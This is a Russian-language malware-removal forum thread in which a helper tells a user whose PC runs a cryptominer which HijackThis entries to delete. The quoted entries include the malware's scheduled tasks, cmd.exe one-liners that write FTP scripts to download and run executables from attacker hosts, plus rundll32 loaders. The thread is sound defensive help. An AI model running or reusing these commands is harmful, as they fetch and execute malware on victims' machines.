Здравствуйте,
Помогите избавиться от lsmosee.exe (Trojan.Win32.Miner.tksi). a.exe (HEUR:Trojan-Downloader.Win32.Generic), обнаруженных Kaspersky Free.
Printable View
Здравствуйте,
Помогите избавиться от lsmosee.exe (Trojan.Win32.Miner.tksi). a.exe (HEUR:Trojan-Downloader.Win32.Generic), обнаруженных Kaspersky Free.
Уважаемый(ая) [B]Jenko[/B], спасибо за обращение на наш форум!
Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в [URL="https://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].
[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="https://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста [URL="https://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].
Запустите HijackThis, расположенный в папке Autologger и [url="http://virusinfo.info/showthread.php?t=4491"]пофиксите[/url] (в [B]Windows Vista/7/8/10[/B] необходимо запускать через правую кнопку мыши [B]Запуск от имени администратора)[/B]):[code]O7 - IPSec: Name: win (2017/08/31) - {5c8ff3e9-d9fb-4c60-bc26-ccc71d42fa39} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2017/08/31) - {5c8ff3e9-d9fb-4c60-bc26-ccc71d42fa39} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2017/08/31) - {5c8ff3e9-d9fb-4c60-bc26-ccc71d42fa39} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2017/08/31) - {5c8ff3e9-d9fb-4c60-bc26-ccc71d42fa39} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2017/08/31) - {5c8ff3e9-d9fb-4c60-bc26-ccc71d42fa39} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
O22 - Task: Mysa - C:\Windows\system32\cmd.exe /c echo open down.mysking.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe
O22 - Task: Mysa1 - C:\Windows\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
O22 - Task: Mysa2 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp0118.info>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
O22 - Task: Mysa3 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp0118.info>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe
O22 - Task: ok - C:\Windows\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa[/code]Удалите остатки Avast! утилитой [URL="http://www.avast.ru/uninstall-utility"]aswclear.exe [/URL] в [URL="http://virusinfo.info/showthread.php?t=9279"]безопасном режиме[/URL].
У Вас Windows 7 без 1-го сервис-пака даже, а после него уже вышли сотни обновлений безопасности. Майнер подсаживают через дыры безопасности, обновляйте систему по полной.